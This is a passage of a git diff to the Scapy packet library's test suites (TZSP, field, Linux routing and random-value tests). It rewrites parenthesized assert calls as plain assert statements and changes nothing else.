-assert(tzsp_tag_packet_count.len == 4) -assert(tzsp_tag_packet_count.packet_count == 0x44332211) +assert tzsp_tag_packet_count.type == 40 +assert tzsp_tag_packet_count.len == 4 +assert tzsp_tag_packet_count.packet_count == 0x44332211 tzsp_tag_end = tzsp_tag_packet_count.payload -assert(tzsp_tag_end.type == 1) +assert tzsp_tag_end.type == 1 == basic TZSP header with RX Packet and RXFrameLength @@ -366,15 +366,15 @@ frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02') / \ frm = frm.build() frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) -assert(tzsp_lyr.type == TZSP.TYPE_RX_PACKET) +assert tzsp_lyr.type == TZSP.TYPE_RX_PACKET tzsp_tag_frame_length = tzsp_lyr.payload -assert(tzsp_tag_frame_length.type == 41) -assert(tzsp_tag_frame_length.len == 2) -assert(tzsp_tag_frame_length.rx_frame_length == 0xbad0) +assert tzsp_tag_frame_length.type == 41 +assert tzsp_tag_frame_length.len == 2 +assert tzsp_tag_frame_length.rx_frame_length == 0xbad0 tzsp_tag_end = tzsp_tag_frame_length.payload -assert(tzsp_tag_end.type == 1) +assert tzsp_tag_end.type == 1 == basic TZSP header with RX Packet and WLAN RADIO HDR SERIAL @@ -394,15 +394,15 @@ frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02') / \ frm = frm.build() frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) -assert(tzsp_lyr.type == TZSP.TYPE_RX_PACKET) +assert tzsp_lyr.type == TZSP.TYPE_RX_PACKET tzsp_tag_sensor_id = tzsp_lyr.payload -assert(tzsp_tag_sensor_id.type == 60) -assert(tzsp_tag_sensor_id.len == len(SENSOR_ID)) -assert(tzsp_tag_sensor_id.sensor_id == SENSOR_ID) +assert tzsp_tag_sensor_id.type == 60 +assert tzsp_tag_sensor_id.len == len(SENSOR_ID) +assert tzsp_tag_sensor_id.sensor_id == SENSOR_ID tzsp_tag_end = tzsp_tag_sensor_id.payload -assert(tzsp_tag_end.type == 1) +assert tzsp_tag_end.type == 1 == handling of unknown tag @@ -424,9 +424,9 @@ frm = frm.build() frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) -assert(tzsp_lyr) +assert tzsp_lyr tzsp_tag_unknown = tzsp_lyr.payload -assert(type(tzsp_tag_unknown) is TZSPTagUnknown) +assert type(tzsp_tag_unknown) is TZSPTagUnknown = all layers stacked @@ -463,62 +463,62 @@ frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) tzsp_raw_rssi_byte_lyr = tzsp_lyr.payload -assert(tzsp_raw_rssi_byte_lyr.type == 10) +assert tzsp_raw_rssi_byte_lyr.type == 10 tzsp_tag_raw_rssi_short = tzsp_raw_rssi_byte_lyr.payload -assert(tzsp_tag_raw_rssi_short.type == 10) +assert tzsp_tag_raw_rssi_short.type == 10 tzsp_tag_snr_byte = tzsp_tag_raw_rssi_short.payload -assert(tzsp_tag_snr_byte.type == 11) +assert tzsp_tag_snr_byte.type == 11 tzsp_tag_snr_short = tzsp_tag_snr_byte.payload -assert(tzsp_tag_snr_short.type == 11) +assert tzsp_tag_snr_short.type == 11 tzsp_tag_data_rate = tzsp_tag_snr_short.payload -assert(tzsp_tag_data_rate.type == 12) +assert tzsp_tag_data_rate.type == 12 tzsp_tag_timestamp = tzsp_tag_data_rate.payload -assert(tzsp_tag_timestamp.type == 13) +assert tzsp_tag_timestamp.type == 13 tzsp_tag_contention_free_no = tzsp_tag_timestamp.payload -assert(tzsp_tag_contention_free_no.type == 15) +assert tzsp_tag_contention_free_no.type == 15 tzsp_tag_contention_free_yes = tzsp_tag_contention_free_no.payload -assert(tzsp_tag_contention_free_yes.type == 15) +assert tzsp_tag_contention_free_yes.type == 15 tzsp_tag_decrypted_no = tzsp_tag_contention_free_yes.payload -assert(tzsp_tag_decrypted_no.type == 16) +assert tzsp_tag_decrypted_no.type == 16 tzsp_tag_decrypted_yes = tzsp_tag_decrypted_no.payload -assert(tzsp_tag_decrypted_yes.type == 16) +assert tzsp_tag_decrypted_yes.type == 16 tzsp_tag_error_yes = tzsp_tag_decrypted_yes.payload -assert(tzsp_tag_error_yes.type == 17) +assert tzsp_tag_error_yes.type == 17 tzsp_tag_error_no = tzsp_tag_error_yes.payload -assert(tzsp_tag_error_no.type == 17) +assert tzsp_tag_error_no.type == 17 tzsp_tag_rx_channel = tzsp_tag_error_no.payload -assert(tzsp_tag_rx_channel.type == 18) +assert tzsp_tag_rx_channel.type == 18 tzsp_tag_packet_count = tzsp_tag_rx_channel.payload -assert(tzsp_tag_packet_count.type == 40) +assert tzsp_tag_packet_count.type == 40 tzsp_tag_frame_length = tzsp_tag_packet_count.payload -assert(tzsp_tag_frame_length.type == 41) +assert tzsp_tag_frame_length.type == 41 tzsp_tag_sensor_id = tzsp_tag_frame_length.payload -assert(tzsp_tag_sensor_id.type == 60) +assert tzsp_tag_sensor_id.type == 60 tzsp_tag_padding = tzsp_tag_sensor_id.payload -assert(tzsp_tag_padding.type == 0) +assert tzsp_tag_padding.type == 0 tzsp_tag_end = tzsp_tag_padding.payload -assert(tzsp_tag_end.type == 1) +assert tzsp_tag_end.type == 1 encapsulated_payload = tzsp_tag_end.payload encapsulated_ether_lyr = encapsulated_payload.getlayer(Ether) -assert(encapsulated_ether_lyr.src == '00:03:03:03:03:03') +assert encapsulated_ether_lyr.src == '00:03:03:03:03:03' + corner cases @@ -538,11 +538,11 @@ frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02')/ \ frm = frm.build() frm = Ether(frm) tzsp_tag_contention_free = frm.getlayer(TZSPTagContentionFree) -assert(tzsp_tag_contention_free) +assert tzsp_tag_contention_free tzsp_tag_contention_free_attr = tzsp_tag_contention_free.get_field('contention_free') -assert(tzsp_tag_contention_free_attr) +assert tzsp_tag_contention_free_attr symb_str = tzsp_tag_contention_free_attr.i2repr(tzsp_tag_contention_free, tzsp_tag_contention_free.contention_free) -assert(symb_str == 'yes') +assert symb_str == 'yes' == TZSPTagError @@ -558,11 +558,11 @@ frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02')/ \ frm = frm.build() frm = Ether(frm) tzsp_tag_error = frm.getlayer(TZSPTagError) -assert(tzsp_tag_error) +assert tzsp_tag_error tzsp_tag_error_attr = tzsp_tag_error.get_field('fcs_error') -assert(tzsp_tag_error_attr) +assert tzsp_tag_error_attr symb_str = tzsp_tag_error_attr.i2repr(tzsp_tag_error, tzsp_tag_error.fcs_error) -assert(symb_str == 'no') +assert symb_str == 'no' frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02')/ \ IP(src='1.1.1.1', dst='2.2.2.2')/ \ @@ -574,11 +574,11 @@ frm = Ether(src='00:01:01:01:01:01', dst='00:02:02:02:02:02')/ \ frm = frm.build() frm = Ether(frm) tzsp_tag_error = frm.getlayer(TZSPTagError) -assert(tzsp_tag_error) +assert tzsp_tag_error tzsp_tag_error_attr = tzsp_tag_error.get_field('fcs_error') -assert(tzsp_tag_error_attr) +assert tzsp_tag_error_attr symb_str = tzsp_tag_error_attr.i2repr(tzsp_tag_error, tzsp_tag_error.fcs_error) -assert(symb_str == 'reserved') +assert symb_str == 'reserved' == missing TZSP header before end tag @@ -608,7 +608,7 @@ frm = frm.build() frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) -assert(type(tzsp_lyr.payload) is Raw ) +assert type(tzsp_lyr.payload) is Raw == handling of unknown tag - payload to short @@ -626,10 +626,10 @@ frm = frm.build() frm = Ether(frm) frm.show() tzsp_lyr = frm.getlayer(TZSP) -assert(tzsp_lyr) +assert tzsp_lyr raw_lyr = tzsp_lyr.payload -assert(type(raw_lyr) is Raw) -assert(raw_lyr.load == b'\xff\x0a\x01\x02\x03\x04\x05') +assert type(raw_lyr) is Raw +assert raw_lyr.load == b'\xff\x0a\x01\x02\x03\x04\x05' == handling of unknown tag - no payload after tag type @@ -647,7 +647,7 @@ frm = frm.build() frm = Ether(frm) tzsp_lyr = frm.getlayer(TZSP) -assert(tzsp_lyr) +assert tzsp_lyr raw_lyr = tzsp_lyr.payload -assert(type(raw_lyr) is Raw) -assert(raw_lyr.load == b'\xff') +assert type(raw_lyr) is Raw +assert raw_lyr.load == b'\xff' diff --git a/test/fields.uts b/test/fields.uts index 3f4a82659ed..d7e12e33539 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -7,13 +7,13 @@ #= Field class #~ core field #Field("foo", None, fmt="H").i2m(None,0xabcdef) -#assert( _ == b"\xcd\xef" ) +#assert _ == b"\xcd\xef" #Field("foo", None, fmt="') -assert(rf.i2repr_one(None, RandNum(0, 10)) == '') -assert(lf.i2repr_one(None, RandNum(0, 10)) == '') -assert(fcb.i2repr_one(None, RandNum(0, 10)) == '') +assert f.i2repr_one(None, RandNum(0, 10)) == '' +assert rf.i2repr_one(None, RandNum(0, 10)) == '' +assert lf.i2repr_one(None, RandNum(0, 10)) == '' +assert fcb.i2repr_one(None, RandNum(0, 10)) == '' True = EnumField.i2repr ~ field enumfield -assert(f.i2repr(None, 0) == 'Foo') -assert(f.i2repr(None, 1) == 'Bar') -assert(f.i2repr(None, 2) == '2') -assert(f.i2repr(None, [0, 1]) == ['Foo', 'Bar']) +assert f.i2repr(None, 0) == 'Foo' +assert f.i2repr(None, 1) == 'Bar' +assert f.i2repr(None, 2) == '2' +assert f.i2repr(None, [0, 1]) == ['Foo', 'Bar'] -assert(rf.i2repr(None, 0) == 'Foo') -assert(rf.i2repr(None, 1) == 'Bar') -assert(rf.i2repr(None, 2) == '2') -assert(rf.i2repr(None, [0, 1]) == ['Foo', 'Bar']) +assert rf.i2repr(None, 0) == 'Foo' +assert rf.i2repr(None, 1) == 'Bar' +assert rf.i2repr(None, 2) == '2' +assert rf.i2repr(None, [0, 1]) == ['Foo', 'Bar'] -assert(lf.i2repr(None, 0) == 'Foo') -assert(lf.i2repr(None, 1) == 'Bar') -assert(lf.i2repr(None, 2) == '2') -assert(lf.i2repr(None, [0, 1]) == ['Foo', 'Bar']) +assert lf.i2repr(None, 0) == 'Foo' +assert lf.i2repr(None, 1) == 'Bar' +assert lf.i2repr(None, 2) == '2' +assert lf.i2repr(None, [0, 1]) == ['Foo', 'Bar'] -assert(fcb.i2repr(None, 0) == 'Foo') -assert(fcb.i2repr(None, 1) == 'Bar') -assert(fcb.i2repr(None, 5) == 'Bar') -assert(fcb.i2repr(None, 11) == repr(11)) -assert(fcb.i2repr(None, [0, 1, 5, 11]) == ['Foo', 'Bar', 'Bar', repr(11)]) +assert fcb.i2repr(None, 0) == 'Foo' +assert fcb.i2repr(None, 1) == 'Bar' +assert fcb.i2repr(None, 5) == 'Bar' +assert fcb.i2repr(None, 11) == repr(11) +assert fcb.i2repr(None, [0, 1, 5, 11]) == ['Foo', 'Bar', 'Bar', repr(11)] conf.noenum.add(f, rf, lf, fcb) -assert(f.i2repr(None, 0) == repr(0)) -assert(f.i2repr(None, 1) == repr(1)) -assert(f.i2repr(None, 2) == repr(2)) -assert(f.i2repr(None, [0, 1, 2]) == [repr(0), repr(1), repr(2)]) +assert f.i2repr(None, 0) == repr(0) +assert f.i2repr(None, 1) == repr(1) +assert f.i2repr(None, 2) == repr(2) +assert f.i2repr(None, [0, 1, 2]) == [repr(0), repr(1), repr(2)] -assert(rf.i2repr(None, 0) == repr(0)) -assert(rf.i2repr(None, 1) == repr(1)) -assert(rf.i2repr(None, 2) == repr(2)) -assert(rf.i2repr(None, [0, 1, 2]) == [repr(0), repr(1), repr(2)]) +assert rf.i2repr(None, 0) == repr(0) +assert rf.i2repr(None, 1) == repr(1) +assert rf.i2repr(None, 2) == repr(2) +assert rf.i2repr(None, [0, 1, 2]) == [repr(0), repr(1), repr(2)] -assert(lf.i2repr(None, 0) == repr(0)) -assert(lf.i2repr(None, 1) == repr(1)) -assert(lf.i2repr(None, 2) == repr(2)) -assert(lf.i2repr(None, [0, 1, 2]) == [repr(0), repr(1), repr(2)]) +assert lf.i2repr(None, 0) == repr(0) +assert lf.i2repr(None, 1) == repr(1) +assert lf.i2repr(None, 2) == repr(2) +assert lf.i2repr(None, [0, 1, 2]) == [repr(0), repr(1), repr(2)] -assert(fcb.i2repr(None, 0) == repr(0)) -assert(fcb.i2repr(None, 1) == repr(1)) -assert(fcb.i2repr(None, 5) == repr(5)) -assert(fcb.i2repr(None, 11) == repr(11)) -assert(fcb.i2repr(None, [0, 1, 5, 11]) == [repr(0), repr(1), repr(5), repr(11)]) +assert fcb.i2repr(None, 0) == repr(0) +assert fcb.i2repr(None, 1) == repr(1) +assert fcb.i2repr(None, 5) == repr(5) +assert fcb.i2repr(None, 11) == repr(11) +assert fcb.i2repr(None, [0, 1, 5, 11]) == [repr(0), repr(1), repr(5), repr(11)] conf.noenum.remove(f, rf, lf, fcb) -assert(f.i2repr_one(None, RandNum(0, 10)) == '') -assert(rf.i2repr_one(None, RandNum(0, 10)) == '') -assert(lf.i2repr_one(None, RandNum(0, 10)) == '') -assert(fcb.i2repr_one(None, RandNum(0, 10)) == '') +assert f.i2repr_one(None, RandNum(0, 10)) == '' +assert rf.i2repr_one(None, RandNum(0, 10)) == '' +assert lf.i2repr_one(None, RandNum(0, 10)) == '' +assert fcb.i2repr_one(None, RandNum(0, 10)) == '' True @@ -1171,13 +1171,13 @@ True = CharEnumField.any2i_one ~ field charenumfield -assert(fc.any2i_one(None, 'Foo') == 'f') -assert(fc.any2i_one(None, 'Bar') == 'b') +assert fc.any2i_one(None, 'Foo') == 'f' +assert fc.any2i_one(None, 'Bar') == 'b' expect_exception(KeyError, 'fc.any2i_one(None, "Baz")') -assert(fcb.any2i_one(None, 'Foo') == 'a') -assert(fcb.any2i_one(None, 'Bar') == 'b') -assert(fcb.any2i_one(None, 'Baz') == '') +assert fcb.any2i_one(None, 'Foo') == 'a' +assert fcb.any2i_one(None, 'Bar') == 'b' +assert fcb.any2i_one(None, 'Baz') == '' True @@ -1210,13 +1210,13 @@ True = XByteEnumField.i2repr_one ~ field xbyteenumfield -assert(f.i2repr_one(None, 0) == 'Foo') -assert(f.i2repr_one(None, 1) == 'Bar') -assert(f.i2repr_one(None, 0xff) == '0xff') +assert f.i2repr_one(None, 0) == 'Foo' +assert f.i2repr_one(None, 1) == 'Bar' +assert f.i2repr_one(None, 0xff) == '0xff' -assert(f.i2repr_one(None, 0) == 'Foo') -assert(f.i2repr_one(None, 1) == 'Bar') -assert(f.i2repr_one(None, 0xff) == '0xff') +assert f.i2repr_one(None, 0) == 'Foo' +assert f.i2repr_one(None, 1) == 'Bar' +assert f.i2repr_one(None, 0xff) == '0xff' True @@ -1234,28 +1234,28 @@ True = XByteEnumField.i2repr_one with update ~ field xbyteenumfield -assert(f.i2repr_one(None, 0) == 'Foo') -assert(f.i2repr_one(None, 1) == 'Bar') -assert(f.i2repr_one(None, 2) == '0x2') -assert(f.i2repr_one(None, 0xff) == '0xff') +assert f.i2repr_one(None, 0) == 'Foo' +assert f.i2repr_one(None, 1) == 'Bar' +assert f.i2repr_one(None, 2) == '0x2' +assert f.i2repr_one(None, 0xff) == '0xff' -assert(f.i2repr_one(None, 0) == 'Foo') -assert(f.i2repr_one(None, 1) == 'Bar') -assert(f.i2repr_one(None, 2) == '0x2') -assert(f.i2repr_one(None, 0xff) == '0xff') +assert f.i2repr_one(None, 0) == 'Foo' +assert f.i2repr_one(None, 1) == 'Bar' +assert f.i2repr_one(None, 2) == '0x2' +assert f.i2repr_one(None, 0xff) == '0xff' del enum[1] enum[2] = 'Baz' -assert(f.i2repr_one(None, 0) == 'Foo') -assert(f.i2repr_one(None, 1) == '0x1') -assert(f.i2repr_one(None, 2) == 'Baz') -assert(f.i2repr_one(None, 0xff) == '0xff') +assert f.i2repr_one(None, 0) == 'Foo' +assert f.i2repr_one(None, 1) == '0x1' +assert f.i2repr_one(None, 2) == 'Baz' +assert f.i2repr_one(None, 0xff) == '0xff' -assert(f.i2repr_one(None, 0) == 'Foo') -assert(f.i2repr_one(None, 1) == '0x1') -assert(f.i2repr_one(None, 2) == 'Baz') -assert(f.i2repr_one(None, 0xff) == '0xff') +assert f.i2repr_one(None, 0) == 'Foo' +assert f.i2repr_one(None, 1) == '0x1' +assert f.i2repr_one(None, 2) == 'Baz' +assert f.i2repr_one(None, 0xff) == '0xff' True @@ -1288,13 +1288,13 @@ True = XShortEnumField.i2repr_one ~ field xshortenumfield -assert(f.i2repr_one(None, 0) == 'Foo') -assert(f.i2repr_one(None, 1) == 'Bar') -assert(f.i2repr_one(None, 0xff) == '0xff') +assert f.i2repr_one(None, 0) == 'Foo' +assert f.i2repr_one(None, 1) == 'Bar' +assert f.i2repr_one(None, 0xff) == '0xff' -assert(f.i2repr_one(None, 0) == 'Foo') -assert(f.i2repr_one(None, 1) == 'Bar') -assert(f.i2repr_one(None, 0xff) == '0xff') +assert f.i2repr_one(None, 0) == 'Foo' +assert f.i2repr_one(None, 1) == 'Bar' +assert f.i2repr_one(None, 0xff) == '0xff' True @@ -1312,28 +1312,28 @@ True = XShortEnumField.i2repr_one with update ~ field xshortenumfield -assert(f.i2repr_one(None, 0) == 'Foo') -assert(f.i2repr_one(None, 1) == 'Bar') -assert(f.i2repr_one(None, 2) == '0x2') -assert(f.i2repr_one(None, 0xff) == '0xff') +assert f.i2repr_one(None, 0) == 'Foo' +assert f.i2repr_one(None, 1) == 'Bar' +assert f.i2repr_one(None, 2) == '0x2' +assert f.i2repr_one(None, 0xff) == '0xff' -assert(f.i2repr_one(None, 0) == 'Foo') -assert(f.i2repr_one(None, 1) == 'Bar') -assert(f.i2repr_one(None, 2) == '0x2') -assert(f.i2repr_one(None, 0xff) == '0xff') +assert f.i2repr_one(None, 0) == 'Foo' +assert f.i2repr_one(None, 1) == 'Bar' +assert f.i2repr_one(None, 2) == '0x2' +assert f.i2repr_one(None, 0xff) == '0xff' del enum[1] enum[2] = 'Baz' -assert(f.i2repr_one(None, 0) == 'Foo') -assert(f.i2repr_one(None, 1) == '0x1') -assert(f.i2repr_one(None, 2) == 'Baz') -assert(f.i2repr_one(None, 0xff) == '0xff') +assert f.i2repr_one(None, 0) == 'Foo' +assert f.i2repr_one(None, 1) == '0x1' +assert f.i2repr_one(None, 2) == 'Baz' +assert f.i2repr_one(None, 0xff) == '0xff' -assert(f.i2repr_one(None, 0) == 'Foo') -assert(f.i2repr_one(None, 1) == '0x1') -assert(f.i2repr_one(None, 2) == 'Baz') -assert(f.i2repr_one(None, 0xff) == '0xff') +assert f.i2repr_one(None, 0) == 'Foo' +assert f.i2repr_one(None, 1) == '0x1' +assert f.i2repr_one(None, 2) == 'Baz' +assert f.i2repr_one(None, 0xff) == '0xff' True @@ -1344,11 +1344,11 @@ True = Raise exception - test data dnsf = DNSStrField("test", "") -assert(dnsf.getfield(None, b"\x01x\x00") == (b"", b"x.")) +assert dnsf.getfield(None, b"\x01x\x00") == (b"", b"x.") try: dnsf.getfield(None, b"\xc0\xff") - assert(False) + assert False except (Scapy_Exception, IndexError): pass @@ -1357,47 +1357,47 @@ except (Scapy_Exception, IndexError): = default usage yn_bf = YesNoByteField('test', 0x00) -assert(yn_bf.i2repr(None, 0x00) == 'no') -assert(yn_bf.i2repr(None, 0x01) == 'yes') -assert(yn_bf.i2repr(None, 0x02) == 'yes') -assert(yn_bf.i2repr(None, 0xff) == 'yes') +assert yn_bf.i2repr(None, 0x00) == 'no' +assert yn_bf.i2repr(None, 0x01) == 'yes' +assert yn_bf.i2repr(None, 0x02) == 'yes' +assert yn_bf.i2repr(None, 0xff) == 'yes' = inverted yes - no (scalar config) yn_bf = YesNoByteField('test', 0x00, config={'yes': 0x00, 'no': 0x01}) -assert(yn_bf.i2repr(None, 0x00) == 'yes') -assert(yn_bf.i2repr(None, 0x01) == 'no') -assert(yn_bf.i2repr(None, 0x02) == 2) -assert(yn_bf.i2repr(None, 0xff) == 255) +assert yn_bf.i2repr(None, 0x00) == 'yes' +assert yn_bf.i2repr(None, 0x01) == 'no' +assert yn_bf.i2repr(None, 0x02) == 2 +assert yn_bf.i2repr(None, 0xff) == 255 = inverted yes - no (range config) yn_bf = YesNoByteField('test', 0x00, config={'yes': 0x00, 'no': (0x01, 0xff)}) -assert(yn_bf.i2repr(None, 0x00) == 'yes') -assert(yn_bf.i2repr(None, 0x01) == 'no') -assert(yn_bf.i2repr(None, 0x02) == 'no') -assert(yn_bf.i2repr(None, 0xff) == 'no') +assert yn_bf.i2repr(None, 0x00) == 'yes' +assert yn_bf.i2repr(None, 0x01) == 'no' +assert yn_bf.i2repr(None, 0x02) == 'no' +assert yn_bf.i2repr(None, 0xff) == 'no' = yes - no (using sets) yn_bf = YesNoByteField('test', 0x00, config={'yes': [0x00, 0x02], 'no': [0x01, 0x04, 0xff]}) -assert(yn_bf.i2repr(None, 0x00) == 'yes') -assert(yn_bf.i2repr(None, 0x01) == 'no') -assert(yn_bf.i2repr(None, 0x02) == 'yes') -assert(yn_bf.i2repr(None, 0x03) == 3) -assert(yn_bf.i2repr(None, 0x04) == 'no') -assert(yn_bf.i2repr(None, 0x05) == 5) -assert(yn_bf.i2repr(None, 0xff) == 'no') +assert yn_bf.i2repr(None, 0x00) == 'yes' +assert yn_bf.i2repr(None, 0x01) == 'no' +assert yn_bf.i2repr(None, 0x02) == 'yes' +assert yn_bf.i2repr(None, 0x03) == 3 +assert yn_bf.i2repr(None, 0x04) == 'no' +assert yn_bf.i2repr(None, 0x05) == 5 +assert yn_bf.i2repr(None, 0xff) == 'no' = yes, no and invalid yn_bf = YesNoByteField('test', 0x00, config={'no': 0x00, 'yes': 0x01, 'invalid': (0x02, 0xff)}) -assert(yn_bf.i2repr(None, 0x00) == 'no') -assert(yn_bf.i2repr(None, 0x01) == 'yes') -assert(yn_bf.i2repr(None, 0x02) == 'invalid') -assert(yn_bf.i2repr(None, 0xff) == 'invalid') +assert yn_bf.i2repr(None, 0x00) == 'no' +assert yn_bf.i2repr(None, 0x01) == 'yes' +assert yn_bf.i2repr(None, 0x02) == 'invalid' +assert yn_bf.i2repr(None, 0xff) == 'invalid' = invalid scalar spec try: YesNoByteField('test', 0x00, config={'no': 0x00, 'yes': 256}) - assert(False) + assert False except FieldValueRangeException: pass @@ -1405,7 +1405,7 @@ except FieldValueRangeException: try: YesNoByteField('test', 0x00, config={'no': 0x00, 'yes': (0x00, 0x02, 0x02)}) - assert(False) + assert False except FieldAttributeException: pass @@ -1413,13 +1413,13 @@ except FieldAttributeException: try: YesNoByteField('test', 0x00, config={'no': 0x00, 'yes': (0x100, 0x01)}) - assert(False) + assert False except FieldValueRangeException: pass try: YesNoByteField('test', 0x00, config={'no': 0x00, 'yes': (0x00, 0x100)}) - assert(False) + assert False except FieldValueRangeException: pass @@ -1427,7 +1427,7 @@ except FieldValueRangeException: try: YesNoByteField('test', 0x00, config={'no': 0x00, 'yes': [0x01, 0x101]}) - assert(False) + assert False except FieldValueRangeException: pass @@ -1941,7 +1941,7 @@ class DebugPacket(Packet): ] a = DebugPacket(val=1234) -assert(a.val == 1234) +assert a.val == 1234 = BitExtendedField i2m: corner values * 7 bits of data = 0 @@ -1950,21 +1950,21 @@ for i in range(8): m = BitExtendedField("foo", None, extension_bit=i) r = m.i2m(None, 0) r = int(codecs.encode(r, 'hex'), 16) - assert(r == 0) + assert r == 0 * 7 bits of data = 1 for i in range(8): m = BitExtendedField("foo", None, extension_bit=i) r = m.i2m(None, 0b1111111) r = int(codecs.encode(r, 'hex'), 16) - assert(r == 0xff - 2**i) + assert r == 0xff - 2**i = BitExtendedField i2m: field expansion * If there is 8 bits of data, we need to add a byte m = BitExtendedField("foo", None, extension_bit=0) r = m.i2m(None, 0b10000000) r = int(codecs.encode(r, 'hex'), 16) -assert(r == 0x0300) +assert r == 0x0300 = BitExtendedField i2m: test all FX bit positions * Data is 0b10000001 (129) and all str values are precomputed @@ -1978,21 +1978,21 @@ for i in range(8): r = m.i2m(None, data_129["extended"]) data_129["str_with_fx"].append(r) r = int(codecs.encode(r, 'hex'), 16) - assert(r == data_129["int_with_fx"][i]) + assert r == data_129["int_with_fx"][i] = BitExtendedField m2i: test all FX bit positions * Data is 0b10000001 (129) and all str values are precomputed for i in range(8): m = BitExtendedField("foo", None, extension_bit=i) r = m.m2i(None, data_129["str_with_fx"][i]) - assert(r == data_129["extended"]) + assert r == data_129["extended"] = BitExtendedField m2i: stop at FX zero * 1 byte of zeroes (FX stop) then 1 byte of ones : ignore 2nd byte for i in range(8): m = BitExtendedField("foo", None, extension_bit=i) r = m.m2i(None, b'\x00\xff') - assert(r == 0) + assert r == 0 = BitExtendedField m2i: multiple bytes * 0b00000011 0b11111110 --> 0xff @@ -2003,14 +2003,14 @@ data_254 = { for i in range(len(data_254['str_with_fx'])): m = BitExtendedField("foo", None, extension_bit=i) r = m.m2i(None, data_254["str_with_fx"][i]) - assert(r == data_254['extended']) + assert r == data_254['extended'] = BitExtendedField m2i: invalid field with no stopping bit * 1 byte of one (no FX stop) shall return an error for i in range(8): m = BitExtendedField("foo", None, extension_bit=i) r = m.m2i(None, b'\xff') - assert(r == None) + assert r == None = LSBExtendedField * Test i2m and m2i @@ -2023,11 +2023,11 @@ m = LSBExtendedField("foo", None) r = m.i2m(None, data_129["extended"]) data_129["str_with_fx"] = r r = int(codecs.encode(r, 'hex'), 16) -assert(r == data_129["int_with_fx"]) +assert r == data_129["int_with_fx"] m = LSBExtendedField("foo", None) r = m.m2i(None, data_129["str_with_fx"]) -assert(r == data_129["extended"]) +assert r == data_129["extended"] = MSBExtendedField * Test i2m and m2i @@ -2040,11 +2040,11 @@ m = MSBExtendedField("foo", None) r = m.i2m(None, data_129["extended"]) data_129["str_with_fx"] = r r = int(codecs.encode(r, 'hex'), 16) -assert(r == data_129["int_with_fx"]) +assert r == data_129["int_with_fx"] m = MSBExtendedField("foo", None) r = m.m2i(None, data_129["str_with_fx"]) -assert(r == data_129["extended"]) +assert r == data_129["extended"] ############ diff --git a/test/linux.uts b/test/linux.uts index bd1bc2245da..516eade1ab8 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -47,9 +47,9 @@ if exit_status == 0: print(get_if_list()) conf.route.resync() print(conf.route.routes) - assert(conf.route.route("198.51.100.254") == ("scapy0", "198.51.100.1", "0.0.0.0")) + assert conf.route.route("198.51.100.254") == ("scapy0", "198.51.100.1", "0.0.0.0") route_alias = (3325256704, 4294967040, "0.0.0.0", "scapy0", "198.51.100.1", 0) - assert(route_alias in conf.route.routes) + assert route_alias in conf.route.routes exit_status = os.system("ip link add link scapy0 name scapy0.42 type vlan id 42") exit_status = os.system("ip addr add 203.0.113.42/24 dev scapy0.42") exit_status = os.system("ip link set scapy0.42 up") @@ -57,9 +57,9 @@ if exit_status == 0: print(get_if_list()) conf.route.resync() print(conf.route.routes) - assert(conf.route.route("192.0.2.43") == ("scapy0.42", "203.0.113.42", "203.0.113.41")) + assert conf.route.route("192.0.2.43") == ("scapy0.42", "203.0.113.42", "203.0.113.41") route_specific = (3221226027, 4294967295, "203.0.113.41", "scapy0.42", "203.0.113.42", 0) - assert(route_specific in conf.route.routes) + assert route_specific in conf.route.routes exit_status = os.system("ip link del name dev scapy0") else: assert True @@ -81,15 +81,15 @@ import os, socket from mock import patch exit_status = os.system("ip link add name scapy_lo type dummy") -assert(exit_status == 0) +assert exit_status == 0 exit_status = os.system("ip link set dev scapy_lo up") -assert(exit_status == 0) +assert exit_status == 0 with patch('scapy.arch.linux.conf.loopback_name', 'scapy_lo'): routes = read_routes() exit_status = os.system("ip addr add dev scapy_lo 10.10.0.1/24") -assert(exit_status == 0) +assert exit_status == 0 with patch('scapy.arch.linux.conf.loopback_name', 'scapy_lo'): routes = read_routes() @@ -99,17 +99,17 @@ for route in routes: dst_int, msk_int, gw_str, if_name, if_addr, metric = route if if_name == 'scapy_lo': got_lo_device = True - assert(if_addr == '10.10.0.1') + assert if_addr == '10.10.0.1' dst_addr = socket.inet_ntoa(struct.pack("!I", dst_int)) - assert(dst_addr == '10.10.0.0') + assert dst_addr == '10.10.0.0' msk = socket.inet_ntoa(struct.pack("!I", msk_int)) assert (msk == '255.255.255.0') break -assert(got_lo_device) +assert got_lo_device exit_status = os.system("ip link del dev scapy_lo") -assert(exit_status == 0) +assert exit_status == 0 = IPv6 link-local address selection @@ -197,7 +197,7 @@ try: iface='veth_scapy_0', count=2) t_sniffer.join(1) - assert(frm_count == 2) + assert frm_count == 2 if_list = get_if_list() assert ('veth_scapy_0' not in if_list) @@ -256,7 +256,7 @@ sendp(Ether(type=0xbeef)/Raw(b'0123456789'), iface='veth_scapy_0', count=2) t_sniffer.join(1) -assert(frm_count == 2) +assert frm_count == 2 try: veth.down() @@ -360,7 +360,7 @@ cond_started.wait() sendp(Ether()/IP(dst="198.51.100.2")/ICMP(), iface='vlanleft0', count=2) t_sniffer.join(1) -assert(dot1q_count == 2) +assert dot1q_count == 2 veth.destroy() diff --git a/test/random.uts b/test/random.uts index 503a3e5a417..ad5d7076c61 100644 --- a/test/random.uts +++ b/test/random.uts @@ -15,46 +15,46 @@ random.seed(0x2807) r6 = RandIP6() assert(r6 == ("d279:1205:e445:5a9f:db28:efc9:afd7:f594" if six.PY2 else "240b:238f:b53f:b727:d0f9:bfc4:2007:e265")) -assert(r6.command() == "RandIP6()") +assert r6.command() == "RandIP6()" random.seed(0x2807) r6 = RandIP6("2001:db8::-") -assert(r6 == ("2001:0db8::e445" if six.PY2 else "2001:0db8::b53f")) -assert(r6.command() == "RandIP6(ip6template='2001:db8::-')") +assert r6 == ("2001:0db8::e445" if six.PY2 else "2001:0db8::b53f") +assert r6.command() == "RandIP6(ip6template='2001:db8::-')" r6 = RandIP6("2001:db8::*") -assert(r6 == ("2001:0db8::efc9" 